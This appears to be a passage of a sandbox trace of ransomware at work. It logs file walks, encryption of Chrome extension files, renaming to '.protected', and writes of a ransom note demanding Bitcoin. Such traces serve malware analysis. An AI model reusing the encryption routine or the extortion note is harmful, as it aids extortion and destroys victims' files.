| out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.900] CloseHandle (hObject=0x164) returned 1 [0083.900] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0083.900] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0083.900] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned 150 [0083.900] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0083.900] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0083.900] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*") returned 152 [0083.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.900] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.900] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.900] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.900] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.900] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.900] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\.") returned 152 [0083.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.901] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.901] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.901] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.901] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.901] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.901] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\..") returned 153 [0083.901] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.901] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.901] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.901] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.901] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.901] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.901] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.901] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.901] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.902] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.902] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0083.902] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.902] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.903] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.903] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.904] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.904] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.904] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.904] CloseHandle (hObject=0x168) returned 1 [0083.904] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.protected") returned 174 [0083.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.protected")) returned 1 [0083.905] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.905] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.905] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\RESTORE_FILES.txt") returned 168 [0083.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.905] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.905] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.906] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.906] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.906] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.906] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.906] CloseHandle (hObject=0x164) returned 1 [0083.906] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="Windows") returned -1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="Program Files") returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="Program Files (x86)") returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="$Recycle.bin") returned 1 [0083.906] lstrcmpiW (lpString1="pt", lpString2="System Volume Information") returned -1 [0083.906] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned 150 [0083.906] lstrcmpW (lpString1="pt", lpString2=".") returned 1 [0083.906] lstrcmpW (lpString1="pt", lpString2="..") returned 1 [0083.906] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*") returned 152 [0083.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.906] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.906] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.906] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.906] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.906] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.907] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\.") returned 152 [0083.907] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.907] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.907] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.907] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.907] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.907] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.907] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.907] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\..") returned 153 [0083.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.907] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.907] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.907] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.907] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.907] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.907] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.907] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.908] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.908] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0083.908] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.908] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.909] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.909] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.910] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.910] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.910] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.910] CloseHandle (hObject=0x168) returned 1 [0083.910] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.protected") returned 174 [0083.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.protected")) returned 1 [0083.910] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.911] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\RESTORE_FILES.txt") returned 168 [0083.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.911] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.911] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.912] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.912] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.912] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.912] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 